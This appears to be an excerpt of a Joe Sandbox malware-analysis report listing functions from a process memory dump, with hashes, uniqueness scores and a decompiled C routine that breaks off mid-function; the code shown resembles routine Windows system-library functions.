Opcode Fuzzy Hash: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
Instruction Fuzzy Hash: 77D05E32461620EEEB321F21FD05F92BBB6AF40F14F050528B1051A5F586B9ED84C690

Uniqueness

Uniqueness Score: -1.00%

Function 34E8E4BC Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
Instruction ID: 5185bdb9afaf374da7c5e87d89167ddf0ff1a9a43f905c1f6e6978abe6c25f9b
Opcode Fuzzy Hash: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
Instruction Fuzzy Hash: 02D0C972254650AFE7729A1CFD00FC373E9AB88B65F160459F519C7151C769EC81CA84

Uniqueness

Uniqueness Score: -1.00%

Function 34ECE588 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
Instruction ID: 2be60b277ee378ddea8862c1ab0367f02f643b2927391c831f26660ab6989116
Opcode Fuzzy Hash: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
Instruction Fuzzy Hash: DEE0E2BAA60784DFDB12DF99CA40F5ABBB9BB84B04F150468A4096B660C628ED00CB40

Uniqueness

Uniqueness Score: -1.00%

Function 34E4A093 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
Instruction ID: 37b4a48d3b1bc61b91006988c4fa3cd0906614013c80a20ee191bae909306149
Opcode Fuzzy Hash: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
Instruction Fuzzy Hash: 42D0127221717097DB295B95B924F577A19DB81BA4F16006D780A93A44C5148C42D6E0

Uniqueness

Uniqueness Score: -1.00%

Function 34E8A750 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
Instruction ID: cf6e7bad6a310381e643effdbbab2954846d20fddf0dacf203dde4fbab12a7ab
Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
Instruction Fuzzy Hash: 97D012771E054CFBDB119F65DC01F957BA9E794B60F044020B505875A0CA3AE950D584

Uniqueness

Uniqueness Score: -1.00%

Function 34E8C620 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
Instruction ID: 852e0d1004d5bf6642770ed4b6c84ff96e821a8e59d894b298c0c9aaf7ac3967
Opcode Fuzzy Hash: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
Instruction Fuzzy Hash: 58C012322A0648AFD7229B98CD01F027BA9EB98B00F000021F2058B670C635EC20EA88

Uniqueness

Uniqueness Score: -1.00%

Function 34E601C0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
Instruction ID: 9f4b8e2587a2205ca19c9554b7f9e633db6dcd793f29a121cec209a5c4d562a2
Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
Instruction Fuzzy Hash: FCD0C93A352D80CFD706CF48C890B0533A4BB44B88FC10490E841CB762E33CD940CA00

Uniqueness

Uniqueness Score: -1.00%

Function 34E50670 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
Instruction ID: 0edc8ec117067aec9c9ec4cb54fad7b6e11f7e7eb9ba48507cf032ed938da14f
Opcode Fuzzy Hash: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
Instruction Fuzzy Hash: CBC04C39791541CFDF05CB19C284F0977E4B754744F1504D0E805CF721D724EC10CA10

Uniqueness

Uniqueness Score: -1.00%

Function 34E934E0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dd6d66e4496b64ccbc5ed6eec480e725080468250e396a681a31b11d3365e56
Instruction ID: 79daa0a0621f42a5d2f2269690a7cd3551c0ce9402d9f30f47d503326c0555c3
Opcode Fuzzy Hash: 3dd6d66e4496b64ccbc5ed6eec480e725080468250e396a681a31b11d3365e56
Instruction Fuzzy Hash: 9D900231E0510402D50462584615706100557D0345FA1C817A0415928DCBA5C95575A3

Uniqueness

Uniqueness Score: -1.00%

Function 34E94570 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4099800f137c9654bb4fde9a0777a318165a83a3f297f3fc84303caa071af26
Instruction ID: e2cd48a3b58d8fbbf934b300272eaa577bfc8bda4531f832c565c1f46431b7b0
Opcode Fuzzy Hash: f4099800f137c9654bb4fde9a0777a318165a83a3f297f3fc84303caa071af26
Instruction Fuzzy Hash: AA900261E0110042454472584905406600567E13453D1C51BA0545920CCA28C859A26A

Uniqueness

Uniqueness Score: -1.00%

Function 34E94260 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b0eefbf261f7a6745b59cf52ca83d6e6f97e5809928bba61fd2fbc37417c998
Instruction ID: 146ab7db57acc428d9dd91362ad9712be431484f6853ca7954d119880c3c1a55
Opcode Fuzzy Hash: 1b0eefbf261f7a6745b59cf52ca83d6e6f97e5809928bba61fd2fbc37417c998
Instruction Fuzzy Hash: D4900231E0540012954472584985546400567E0345B91C417E0415914CCE24C95A6362

Uniqueness

Uniqueness Score: -1.00%

Function 34E92CD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1de08622d48cfd0b33ca7f6672b1bd4d40f6c2db791798200f0ce28ff1c6e78
Instruction ID: a70c781b98bec726a512395020374237322077c950bb7b80afe60ac8e8d8ff17
Opcode Fuzzy Hash: f1de08622d48cfd0b33ca7f6672b1bd4d40f6c2db791798200f0ce28ff1c6e78
Instruction Fuzzy Hash: B8900231A4100402D54572584505606000967D0385FD1C417A0415914ECA65CA5ABA62

Uniqueness

Uniqueness Score: -1.00%

Function 34E93C90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e1f14ae8dedeede91e90c3bb30f54b16400cddca6c682a91cb412958e54cb3f
Instruction ID: 162ab8f9c2b42f82151a206b72b411600daf6fac2ea7ff61d06f719ebd380d02
Opcode Fuzzy Hash: 2e1f14ae8dedeede91e90c3bb30f54b16400cddca6c682a91cb412958e54cb3f
Instruction Fuzzy Hash: BF900235A0100402D91462585905646004657D0345F91D817A0415918DCA64C8A5B122

Uniqueness

Uniqueness Score: -1.00%

Function 34E92C20 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 606e46abe961594c6b5c6277239770550dbf7eecd21ca252fd5bc1a3e9f95313
Instruction ID: 9504c624d4d362382f24c613524396906ad410ba065330a50f7a41974c49eafc
Opcode Fuzzy Hash: 606e46abe961594c6b5c6277239770550dbf7eecd21ca252fd5bc1a3e9f95313
Instruction Fuzzy Hash: 30900221A0504442D50466585509A06000557D0349F91D417A1055955DCA35C855B132

Uniqueness

Uniqueness Score: -1.00%

Function 34E93C30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1705bfd3a90c7cdeb0e1275ec84e5f119d891ca28d4dc0ef8612232c412cdbab
Instruction ID: 608335f8dc9124a8add2396f6ca366c760e989ccec2ca9e5db5357a5edfc49d0
Opcode Fuzzy Hash: 1705bfd3a90c7cdeb0e1275ec84e5f119d891ca28d4dc0ef8612232c412cdbab
Instruction Fuzzy Hash: 81900231A0200142994463585905A4E410557E1346BD1D81BA0006914CCD24C8656222

Uniqueness

Uniqueness Score: -1.00%

Function 34E92C10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2819986b4a2431b77b23e1fd0cf9a273b5a728dc91549286c9e474b7bae0d89b
Instruction ID: f73c612e6f45eeef24d9f2a19a17368919926376cce0e2e0bc01f0092a1a852f
Opcode Fuzzy Hash: 2819986b4a2431b77b23e1fd0cf9a273b5a728dc91549286c9e474b7bae0d89b
Instruction Fuzzy Hash: 73900231A0100403D50462585609707000557D0345F91D817A0415918DDA66C8557122

Uniqueness

Uniqueness Score: -1.00%

Function 34E92D50 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6fe0c6c56035033477288cc654e67b1e7b440a8017245d00f760bd88f9f0497
Instruction ID: f24635950fec9ab7c1569394355894fae108530304d1d1f0728faee5974d74a1
Opcode Fuzzy Hash: d6fe0c6c56035033477288cc654e67b1e7b440a8017245d00f760bd88f9f0497
Instruction Fuzzy Hash: A7900221B0100402D50662584515606000997D1389FD1C417E1415915DCA35C957B133

Uniqueness

Uniqueness Score: -1.00%

Function 34E92EC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a587ed41d12dddf44c66ce9152b966d16917efcd024d3136af7d8329f04f63e3
Instruction ID: 05f7ff2a393c6a51a36aeef7e6c3d90c05971b380672003ad5b95d01000833c4
Opcode Fuzzy Hash: a587ed41d12dddf44c66ce9152b966d16917efcd024d3136af7d8329f04f63e3
Instruction Fuzzy Hash: D0900231A0140402D50462584909747000557D0346F91C417A5155915ECA75C8957532

Uniqueness

Uniqueness Score: -1.00%

Function 34E92E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 633f71df71b8a5918084592d38352578ae21436d1ed7cb1bc682e11f2d23aafa
Instruction ID: 809dc35a3ea0a88c2d27b77fe2df626bb89dbbededad09d682fd833bb11739f8
Opcode Fuzzy Hash: 633f71df71b8a5918084592d38352578ae21436d1ed7cb1bc682e11f2d23aafa
Instruction Fuzzy Hash: 10900261A1100042D50862584505706004557E1345F91C417A2145914CC939CC656126

Uniqueness

Uniqueness Score: -1.00%

Function 34E92E00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17f054fa3cda92c3ed85ce13bf09612cbd8c707b149701dc3995433762e02c7a
Instruction ID: de902f5113e8eef9e846a6058adf4af5b88aef11f6592ae1815777b10411099b
Opcode Fuzzy Hash: 17f054fa3cda92c3ed85ce13bf09612cbd8c707b149701dc3995433762e02c7a
Instruction Fuzzy Hash: 86900261A0140403D54466584905607000557D0346F91C417A2055915ECE39CC557136

Uniqueness

Uniqueness Score: -1.00%

Function 34E92FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64942176c6a268a72979cf3273ddb8367cbcac90d72641cb5c0a64d34333ccad
Instruction ID: 320a155663720d6077eb6f45b9a3e8c3821ed8145d67e35fee76fbe492b9bf23
Opcode Fuzzy Hash: 64942176c6a268a72979cf3273ddb8367cbcac90d72641cb5c0a64d34333ccad
Instruction Fuzzy Hash: D5900221A4100802D54472588515707000697D0745F91C417A0015914DCA26C96976B2

Uniqueness

Uniqueness Score: -1.00%

Function 34E92F30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19fa568ad4b1607c254a96fd5f9b30c530b9c9ba4e26c9107e0bc44d857e313c
Instruction ID: b4d609c0bd3910edb13474cb6c72c698a660d15477015d5813743362318425b1
Opcode Fuzzy Hash: 19fa568ad4b1607c254a96fd5f9b30c530b9c9ba4e26c9107e0bc44d857e313c
Instruction Fuzzy Hash: 08900221A0144442D54463584905B0F410557E1346FD1C41FA4147914CCD25C8596722

Uniqueness

Uniqueness Score: -1.00%

Function 34E938D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72511c407ffbd6f59cdd97fb6992b8f0ba2055f67e30641574908aada66be953
Instruction ID: fed7daa12b54b8b3e471a6055752c8f51670aef2d9e03f689798ae7c529c954a
Opcode Fuzzy Hash: 72511c407ffbd6f59cdd97fb6992b8f0ba2055f67e30641574908aada66be953
Instruction Fuzzy Hash: 43900221A4505102D554725C4505616400577E0345F91C427A0805954DC965C8597222

Uniqueness

Uniqueness Score: -1.00%

Function 34E929D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d044b66b3a2d7821f65d0c705837b3b874785fc68dd0fae885d4bf3f8fe4da7
Instruction ID: add38a30294d5e1e260f704bb621ae3432660c7427641c63fcab231c6a52fc7d
Opcode Fuzzy Hash: 3d044b66b3a2d7821f65d0c705837b3b874785fc68dd0fae885d4bf3f8fe4da7
Instruction Fuzzy Hash: 249002A1A01140924904A3588505B0A450557E0345B91C41BE1045920CC935C855A136

Uniqueness

Uniqueness Score: -1.00%

Function 34E92AC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 740ccc1f2e48e456cb51bac814026f55d182839798fbbdf5e316ef97f04452a9
Instruction ID: 9bba9bfb661c7bfff2ae7c889b29ed2cfbde7f314f8b3f338e9064679820a4a0
Opcode Fuzzy Hash: 740ccc1f2e48e456cb51bac814026f55d182839798fbbdf5e316ef97f04452a9
Instruction Fuzzy Hash: 28900231E0500802D55472584515746000557D0345F91C417A0015A14DCB65CA5976A2

Uniqueness

Uniqueness Score: -1.00%

Function 34E92AA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4419bc0fc8810aa01ac9cf4a5468fc88712ed2746495f2820273052d7e12c18
Instruction ID: 96192bc74a021bd2eae0bddec35b433c6e7f219cbec896f482a1fda08a17dc40
Opcode Fuzzy Hash: e4419bc0fc8810aa01ac9cf4a5468fc88712ed2746495f2820273052d7e12c18
Instruction Fuzzy Hash: 2E900231A0100802D50862584905686000557D0345F91C417A6015A15EDA75C8957132

Uniqueness

Uniqueness Score: -1.00%

Function 34F2A1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34F2A25D
RtlDebugPrintTimes.NTDLL ref: 34F2A2F1
RtlDebugPrintTimes.NTDLL ref: 34F2A314
RtlDebugPrintTimes.NTDLL ref: 34F2A340
RtlDebugPrintTimes.NTDLL ref: 34F2A415
RtlDebugPrintTimes.NTDLL ref: 34F2A468
RtlDebugPrintTimes.NTDLL ref: 34F2A487
RtlDebugPrintTimes.NTDLL ref: 34F2A4B8

Strings

HEAP: , xrefs: 34F2A206

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP:
API String ID: 3446177414-2466845122
Opcode ID: 3f4f45998680fcc9b72174005780f841674b2d29cdbc3f51e11b0637524ebdd2
Instruction ID: 1497f19a418bfeba569aa84328562d5cf0da3513413deacbef7b1ee1bb485ce7
Opcode Fuzzy Hash: 3f4f45998680fcc9b72174005780f841674b2d29cdbc3f51e11b0637524ebdd2
Instruction Fuzzy Hash: BBA19C7AB147128FD704CE28C894A1BB7E5FB88354F084A6DE945DB360EB31EC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 34E87550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E34E87550(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x34f4b370 ^ _t107;
				_v8 =  *0x34f4b370 ^ _t107;
				_t105 = __ecx;
				if( *0x34f46664 == 0) {
					L5:
					return L34E94B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E34E5E580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v556 = _t85;
					_t49 = E34E87738(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v556 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E34E8763B(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v556 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v556);
							_push(0x22);
							_push(0xffffffff);
							_t45 = L34E92B70();
						}
						goto L4;
					}
					_v552 = _t85;
					_t102 =  &_v552;
					_t55 = E34E876ED(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v552 - _t85;
						if(_v552 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
